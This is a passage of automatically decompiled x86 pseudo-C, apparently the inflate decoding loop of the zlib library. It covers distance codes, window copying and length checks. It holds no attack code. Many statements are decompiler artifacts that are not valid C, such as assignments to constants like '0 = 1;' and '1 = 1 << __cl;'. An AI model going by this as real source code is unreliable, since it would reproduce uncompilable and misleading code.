                                                                                                                                                                                        											__ecx = __eax;
                                                                                                                                                                                        											__edi =  *(__ebp - 0x10);
                                                                                                                                                                                        											__ecx = __eax >> 8;
                                                                                                                                                                                        											__esi = __cl & 0x000000ff;
                                                                                                                                                                                        											__ecx = __bl & 0x000000ff;
                                                                                                                                                                                        											__ebx =  *(__ebp - 0x24);
                                                                                                                                                                                        											__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                                                                                                        											__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                                                                                                        											if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                                                                                                        												L251:
                                                                                                                                                                                        												__esi =  *(__ebp + 8);
                                                                                                                                                                                        												__ecx = __dh & 0x000000ff;
                                                                                                                                                                                        												__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        												__edx =  *(__ebp - 0xc) >> __cl;
                                                                                                                                                                                        												__edi = __edi - __ecx;
                                                                                                                                                                                        												__eflags = __edi;
                                                                                                                                                                                        												 *(__ebx + 0x1bc4) = __ecx;
                                                                                                                                                                                        												goto L252;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												goto L249;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L249:
                                                                                                                                                                                        												__esi =  *(__ebp - 4);
                                                                                                                                                                                        												__eflags = __esi;
                                                                                                                                                                                        												if(__esi == 0) {
                                                                                                                                                                                        													goto L322;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L250:
                                                                                                                                                                                        												__esi = __esi - 1;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												 *(__ebp - 4) = __esi;
                                                                                                                                                                                        												__edi = __edi + 8;
                                                                                                                                                                                        												__esi =  *(__ebp - 8);
                                                                                                                                                                                        												 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        												__edi = __dh & 0x000000ff;
                                                                                                                                                                                        												 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *__esi & 0x000000ff) << __cl);
                                                                                                                                                                                        												__esi = __esi + 1;
                                                                                                                                                                                        												__eax =  *(__ebp - 0x32) & 0x0000ffff;
                                                                                                                                                                                        												 *(__ebp - 8) = __esi;
                                                                                                                                                                                        												0 = 1;
                                                                                                                                                                                        												__dl & 0x000000ff = __edi + (__dl & 0x000000ff);
                                                                                                                                                                                        												__esi = 1 << __cl;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												(1 << __cl) - 1 = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                                                                                                        												__esi = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                                                                                                        												__esi = (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff);
                                                                                                                                                                                        												__eax =  *(__ebx + 0x4c);
                                                                                                                                                                                        												__eax =  *( *(__ebx + 0x4c) + ((((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff)) * 4);
                                                                                                                                                                                        												__eax = __eax >> 8;
                                                                                                                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        												__ecx = __edi + (__cl & 0x000000ff);
                                                                                                                                                                                        												__edi =  *(__ebp - 0x10);
                                                                                                                                                                                        												__eflags = __ecx - __edi;
                                                                                                                                                                                        												if(__ecx > __edi) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L251;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L239:
                                                                                                                                                                                        										__eax =  *(__ebp - 0x18);
                                                                                                                                                                                        										__eflags = __eax - 0x102;
                                                                                                                                                                                        										if(__eax < 0x102) {
                                                                                                                                                                                        											goto L242;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L240:
                                                                                                                                                                                        										__ebx =  *(__ebp - 0x1c);
                                                                                                                                                                                        										_push( *(__ebp - 0x28));
                                                                                                                                                                                        										 *(__esi + 0xc) =  *(__ebp - 0x1c);
                                                                                                                                                                                        										__ebx =  *(__ebp - 0x24);
                                                                                                                                                                                        										 *(__esi + 0x10) = __eax;
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										 *__esi =  *(__ebp - 8);
                                                                                                                                                                                        										 *(__esi + 4) = __ecx;
                                                                                                                                                                                        										_push(__esi);
                                                                                                                                                                                        										 *(__ebx + 0x38) = __edx;
                                                                                                                                                                                        										 *(__ebx + 0x3c) = __edi;
                                                                                                                                                                                        										__eax = E01323840();
                                                                                                                                                                                        										__eflags =  *__ebx - 0xb;
                                                                                                                                                                                        										__eax =  *(__esi + 0xc);
                                                                                                                                                                                        										__edx =  *(__ebx + 0x38);
                                                                                                                                                                                        										__edi =  *(__ebx + 0x3c);
                                                                                                                                                                                        										_pop(__ecx);
                                                                                                                                                                                        										 *(__ebp - 0x1c) =  *(__esi + 0xc);
                                                                                                                                                                                        										__eax =  *(__esi + 0x10);
                                                                                                                                                                                        										_pop(__ecx);
                                                                                                                                                                                        										__ecx =  *(__esi + 4);
                                                                                                                                                                                        										 *(__ebp - 0x18) =  *(__esi + 0x10);
                                                                                                                                                                                        										__eax =  *__esi;
                                                                                                                                                                                        										 *(__ebp - 8) =  *__esi;
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        										 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        										 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        										if( *__ebx == 0xb) {
                                                                                                                                                                                        											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L135;
                                                                                                                                                                                        									case 0x15:
                                                                                                                                                                                        										L259:
                                                                                                                                                                                        										__esi =  *(__ebx + 0x48);
                                                                                                                                                                                        										__eflags = __esi;
                                                                                                                                                                                        										if(__esi == 0) {
                                                                                                                                                                                        											L265:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x40);
                                                                                                                                                                                        											 *(__ebx + 0x1bc8) =  *(__ebx + 0x40);
                                                                                                                                                                                        											 *__ebx = 0x16;
                                                                                                                                                                                        											goto L266;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L260:
                                                                                                                                                                                        										__eflags = __edi - __esi;
                                                                                                                                                                                        										if(__edi >= __esi) {
                                                                                                                                                                                        											L264:
                                                                                                                                                                                        											__eax = 0;
                                                                                                                                                                                        											__ecx = __esi;
                                                                                                                                                                                        											__eax = 1;
                                                                                                                                                                                        											__edi = __edi - __esi;
                                                                                                                                                                                        											1 << __cl = (1 << __cl) - 1;
                                                                                                                                                                                        											 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        											__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                                                        											__edx = __edx >> __cl;
                                                                                                                                                                                        											 *(__ebx + 0x40) =  *(__ebx + 0x40) + __eax;
                                                                                                                                                                                        											_t580 = __ebx + 0x1bc4;
                                                                                                                                                                                        											 *_t580 =  *(__ebx + 0x1bc4) + __esi;
                                                                                                                                                                                        											__eflags =  *_t580;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											goto L265;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L261:
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L262:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L263:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __eax + __edx;
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											__eflags = __edi - __esi;
                                                                                                                                                                                        											if(__edi < __esi) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L264;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									case 0x16:
                                                                                                                                                                                        										L266:
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x58);
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__esi =  *(__ebx + 0x50);
                                                                                                                                                                                        										1 = 1 << __cl;
                                                                                                                                                                                        										__eax = (1 << __cl) - 1;
                                                                                                                                                                                        										 *(__ebp - 0x30) = __esi;
                                                                                                                                                                                        										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                                                        										__eax =  *(__esi + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                                                                                                        										1 = 1 >> 8;
                                                                                                                                                                                        										__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        										__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                                                        										if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                                                        											L270:
                                                                                                                                                                                        											__eflags = __al & 0x000000f0;
                                                                                                                                                                                        											if((__al & 0x000000f0) != 0) {
                                                                                                                                                                                        												L275:
                                                                                                                                                                                        												__esi =  *(__ebp + 8);
                                                                                                                                                                                        												__eax = __eax >> 8;
                                                                                                                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                                                        												__edi = __edi - __ecx;
                                                                                                                                                                                        												__edx = __edx >> __cl;
                                                                                                                                                                                        												 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        												 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        												__eflags = __al & 0x00000040;
                                                                                                                                                                                        												if((__al & 0x00000040) == 0) {
                                                                                                                                                                                        													L277:
                                                                                                                                                                                        													__ecx = __eax;
                                                                                                                                                                                        													 *__ebx = 0x17;
                                                                                                                                                                                        													__ecx = __eax >> 0x10;
                                                                                                                                                                                        													__eax = __al & 0x000000ff;
                                                                                                                                                                                        													__eax = __al & 0xf;
                                                                                                                                                                                        													__eflags = __eax;
                                                                                                                                                                                        													 *(__ebx + 0x44) = __ecx;
                                                                                                                                                                                        													 *(__ebx + 0x48) = __eax;
                                                                                                                                                                                        													goto L278;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L276:
                                                                                                                                                                                        												 *(__esi + 0x18) = "invalid distance code";
                                                                                                                                                                                        												goto L17;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L271:
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											__ecx = __al & 0x000000ff;
                                                                                                                                                                                        											__ebx = __eax;
                                                                                                                                                                                        											__edi = 1;
                                                                                                                                                                                        											__ebx = __eax >> 8;
                                                                                                                                                                                        											__edx = __eax;
                                                                                                                                                                                        											__esi = __bl & 0x000000ff;
                                                                                                                                                                                        											__ecx = (__al & 0x000000ff) + __esi;
                                                                                                                                                                                        											__eax = __eax >> 0x10;
                                                                                                                                                                                        											__edi = 1 << __cl;
                                                                                                                                                                                        											__ecx = __esi;
                                                                                                                                                                                        											__edi = (1 << __cl) - 1;
                                                                                                                                                                                        											 *(__ebp - 0x34) = __edx;
                                                                                                                                                                                        											(1 << __cl) - 0x00000001 &  *(__ebp - 0xc) = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                                                                                                        											__ecx =  *(__ebp - 0x30);
                                                                                                                                                                                        											__edi = __eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl);
                                                                                                                                                                                        											__eax =  *( *(__ebp - 0x30) + (__eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl)) * 4);
                                                                                                                                                                                        											__ecx = __eax;
                                                                                                                                                                                        											__edi =  *(__ebp - 0x10);
                                                                                                                                                                                        											__ecx = __eax >> 8;
                                                                                                                                                                                        											__esi = __cl & 0x000000ff;
                                                                                                                                                                                        											__ecx = __bl & 0x000000ff;
                                                                                                                                                                                        											__ebx =  *(__ebp - 0x24);
                                                                                                                                                                                        											__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                                                                                                        											__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                                                                                                        											if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                                                                                                        												L274:
                                                                                                                                                                                        												__ecx = __dh & 0x000000ff;
                                                                                                                                                                                        												__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        												__edi = __edi - __ecx;
                                                                                                                                                                                        												__edx =  *(__ebp - 0xc) >> __cl;
                                                                                                                                                                                        												_t626 = __ebx + 0x1bc4;
                                                                                                                                                                                        												 *_t626 =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                                                        												__eflags =  *_t626;
                                                                                                                                                                                        												goto L275;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												goto L272;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L272:
                                                                                                                                                                                        												__esi =  *(__ebp - 4);
                                                                                                                                                                                        												__eflags = __esi;
                                                                                                                                                                                        												if(__esi == 0) {
                                                                                                                                                                                        													goto L322;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L273:
                                                                                                                                                                                        												__esi = __esi - 1;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												 *(__ebp - 4) = __esi;
                                                                                                                                                                                        												__edi = __edi + 8;
                                                                                                                                                                                        												__esi =  *(__ebp - 8);
                                                                                                                                                                                        												 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        												__edi = __dh & 0x000000ff;
                                                                                                                                                                                        												 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *__esi & 0x000000ff) << __cl);
                                                                                                                                                                                        												__esi = __esi + 1;
                                                                                                                                                                                        												__eax =  *(__ebp - 0x32) & 0x0000ffff;
                                                                                                                                                                                        												 *(__ebp - 8) = __esi;
                                                                                                                                                                                        												0 = 1;
                                                                                                                                                                                        												__dl & 0x000000ff = __edi + (__dl & 0x000000ff);
                                                                                                                                                                                        												__esi = 1 << __cl;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												(1 << __cl) - 1 = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                                                                                                        												__esi = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                                                                                                        												__esi = (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff);
                                                                                                                                                                                        												__eax =  *(__ebx + 0x50);
                                                                                                                                                                                        												__eax =  *( *(__ebx + 0x50) + ((((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff)) * 4);
                                                                                                                                                                                        												__eax = __eax >> 8;
                                                                                                                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        												__ecx = __edi + (__cl & 0x000000ff);
                                                                                                                                                                                        												__edi =  *(__ebp - 0x10);
                                                                                                                                                                                        												__eflags = __ecx - __edi;
                                                                                                                                                                                        												if(__ecx > __edi) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L274;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L267:
                                                                                                                                                                                        										__esi =  *(__ebp - 4);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L268:
                                                                                                                                                                                        											__eflags = __esi;
                                                                                                                                                                                        											if(__esi == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L269:
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__esi = __esi - 1;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											 *(__ebp - 4) = __esi;
                                                                                                                                                                                        											 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        											 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x58);
                                                                                                                                                                                        											__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                                                                                                        											 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                                                        											__eax =  *(__ebx + 0x50);
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											0 = 1;
                                                                                                                                                                                        											1 << __cl = (1 << __cl) - 1;
                                                                                                                                                                                        											__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                                                                                                        											__eax =  *( *(__ebx + 0x50) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
                                                                                                                                                                                        											__ecx = __eax;
                                                                                                                                                                                        											__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        											__eax >> 8 = __cl & 0x000000ff;
                                                                                                                                                                                        											__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                                                        											if((__cl & 0x000000ff) > __edi) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L270;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									case 0x17:
                                                                                                                                                                                        										L278:
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x48);
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											L284:
                                                                                                                                                                                        											 *__ebx = 0x18;
                                                                                                                                                                                        											goto L285;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L279:
                                                                                                                                                                                        										__eflags = __edi - __ecx;
                                                                                                                                                                                        										if(__edi >= __ecx) {
                                                                                                                                                                                        											L283:
                                                                                                                                                                                        											__eax = 0;
                                                                                                                                                                                        											__edi = __edi - __ecx;
                                                                                                                                                                                        											__eax = 1;
                                                                                                                                                                                        											 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        											1 << __cl = (1 << __cl) - 1;
                                                                                                                                                                                        											__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                                                        											__edx = __edx >> __cl;
                                                                                                                                                                                        											 *(__ebx + 0x44) = __eax +  *(__ebx + 0x44);
                                                                                                                                                                                        											_t649 = __ebx + 0x1bc4;
                                                                                                                                                                                        											 *_t649 =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                                                        											__eflags =  *_t649;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											goto L284;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L280:
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L281:
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L323;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L282:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x48);
                                                                                                                                                                                        											__edx = __eax + __edx;
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											__eflags = __edi - __ecx;
                                                                                                                                                                                        											if(__edi < __ecx) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L283;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L323;
                                                                                                                                                                                        									case 0x18:
                                                                                                                                                                                        										L285:
                                                                                                                                                                                        										__ecx =  *(__ebp - 0x18);
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L286:
                                                                                                                                                                                        										__eax =  *(__ebp - 0x28);
                                                                                                                                                                                        										__eax =  *(__ebp - 0x28) - __ecx;
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x44);
                                                                                                                                                                                        										__eflags = __ecx - __eax;
                                                                                                                                                                                        										if(__ecx <= __eax) {
                                                                                                                                                                                        											L295:
                                                                                                                                                                                        											__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                        											__eax =  *(__ebp - 0x1c) - __ecx;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        											__eax =  *(__ebx + 0x40);
                                                                                                                                                                                        											L296:
                                                                                                                                                                                        											__ecx = __eax;
                                                                                                                                                                                        											L297:
                                                                                                                                                                                        											__esi =  *(__ebp - 0x18);
                                                                                                                                                                                        											__eflags = __ecx - __esi;
                                                                                                                                                                                        											__ecx =  >  ? __esi : __ecx;
                                                                                                                                                                                        											__esi = __esi - __ecx;
                                                                                                                                                                                        											__eax = __eax - __ecx;
                                                                                                                                                                                        											 *(__ebp - 0x18) = __esi;
                                                                                                                                                                                        											__esi =  *(__ebp - 0x34);
                                                                                                                                                                                        											 *(__ebx + 0x40) = __eax;
                                                                                                                                                                                        											__ebx =  *(__ebp - 0x1c);
                                                                                                                                                                                        											__esi =  *(__ebp - 0x34) - __ebx;
                                                                                                                                                                                        											__eflags = __esi;
                                                                                                                                                                                        											do {
                                                                                                                                                                                        												L298:
                                                                                                                                                                                        												__al =  *((intOrPtr*)(__esi + __ebx));
                                                                                                                                                                                        												 *__ebx = __al;
                                                                                                                                                                                        												__ebx = __ebx + 1;
                                                                                                                                                                                        												__ecx = __ecx - 1;
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        											} while (__ecx != 0);
                                                                                                                                                                                        											__esi =  *(__ebp + 8);
                                                                                                                                                                                        											 *(__ebp - 0x1c) = __ebx;
                                                                                                                                                                                        											__ebx =  *(__ebp - 0x24);
                                                                                                                                                                                        											__eflags =  *(__ebx + 0x40) - __ecx;
                                                                                                                                                                                        											if( *(__ebx + 0x40) == __ecx) {
                                                                                                                                                                                        												 *__ebx = 0x14;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L134;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L287:
                                                                                                                                                                                        										__ecx = __ecx - __eax;
                                                                                                                                                                                        										__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x2c));
                                                                                                                                                                                        										if(__ecx <=  *((intOrPtr*)(__ebx + 0x2c))) {
                                                                                                                                                                                        											L290:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x34);
                                                                                                                                                                                        											__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x30));
                                                                                                                                                                                        											if(__ecx <=  *((intOrPtr*)(__ebx + 0x30))) {
                                                                                                                                                                                        												__eax = __eax - __ecx;
                                                                                                                                                                                        												__eax = __eax +  *((intOrPtr*)(__ebx + 0x30));
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												__ecx = __ecx -  *((intOrPtr*)(__ebx + 0x30));
                                                                                                                                                                                        												__eax = __eax +  *((intOrPtr*)(__ebx + 0x28));
                                                                                                                                                                                        												__eax = __eax - __ecx;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        											__eax =  *(__ebx + 0x40);
                                                                                                                                                                                        											__eflags = __ecx - __eax;
                                                                                                                                                                                        											if(__ecx <= __eax) {
                                                                                                                                                                                        												goto L297;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												L294:
                                                                                                                                                                                        												goto L296;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L288:
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x1bc0);
                                                                                                                                                                                        										if( *(__ebx + 0x1bc0) == 0) {
                                                                                                                                                                                        											goto L290;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L289:
                                                                                                                                                                                        										 *(__esi + 0x18) = "invalid distance too far back";
                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                        									case 0x19:
                                                                                                                                                                                        										L301:
                                                                                                                                                                                        										__eflags =  *(__ebp - 0x18);
                                                                                                                                                                                        										if( *(__ebp - 0x18) == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L302:
                                                                                                                                                                                        										__esi =  *(__ebp - 0x1c);
                                                                                                                                                                                        										__al =  *(__ebx + 0x40);
                                                                                                                                                                                        										 *(__ebp - 0x1c) =  *(__ebp - 0x1c) + 1;
                                                                                                                                                                                        										 *(__ebp - 0x18) =  *(__ebp - 0x18) - 1;
                                                                                                                                                                                        										 *( *(__ebp - 0x1c)) = __al;
                                                                                                                                                                                        										__esi =  *(__ebp + 8);
                                                                                                                                                                                        										 *__ebx = 0x14;
                                                                                                                                                                                        										goto L135;
                                                                                                                                                                                        									case 0x1a:
                                                                                                                                                                                        										L303:
                                                                                                                                                                                        										__eflags =  *(__ebx + 8);
                                                                                                                                                                                        										if ( *(__ebx + 8) == 0) goto L306;
                                                                                                                                                                                        										__eflags =  *(__ebp - 0x7d000000) & __bh;
                                                                                                                                                                                        									case 0x1b:
                                                                                                                                                                                        										L307:
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__eflags =  *(__ebx + 8);
                                                                                                                                                                                        										if( *(__ebx + 8) == 0) {
                                                                                                                                                                                        											L318:
                                                                                                                                                                                        											 *__ebx = 0x1c;
                                                                                                                                                                                        											goto L319;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L308:
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10);
                                                                                                                                                                                        										if( *(__ebx + 0x10) == 0) {
                                                                                                                                                                                        											goto L318;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L309:
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi >= 0x20) {
                                                                                                                                                                                        											L314:
                                                                                                                                                                                        											__eflags = __edx -  *((intOrPtr*)(0x1c + __ebx));
                                                                                                                                                                                        											if(__edx ==  *((intOrPtr*)(0x1c + __ebx))) {
                                                                                                                                                                                        												L317:
                                                                                                                                                                                        												 *(__ebp - 0xc) = __eax;
                                                                                                                                                                                        												__edi = __eax;
                                                                                                                                                                                        												goto L318;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L315:
                                                                                                                                                                                        											 *(__esi + 0x18) = "incorrect length check";
                                                                                                                                                                                        											L17:
                                                                                                                                                                                        											 *_t800 = 0x1d;
                                                                                                                                                                                        											L134:
                                                                                                                                                                                        											_t806 =  *(_t841 - 4);
                                                                                                                                                                                        											goto L135;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L310:
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L311:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L312:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __eax + __edx;
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        											__eflags = __edi - 0x20;
                                                                                                                                                                                        											if(__edi < 0x20) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L313:
                                                                                                                                                                                        											__eax = 0;
                                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                                        											goto L314;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									case 0x1c:
                                                                                                                                                                                        										L319:
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__eax = 1;
                                                                                                                                                                                        										goto L321;
                                                                                                                                                                                        									case 0x1d:
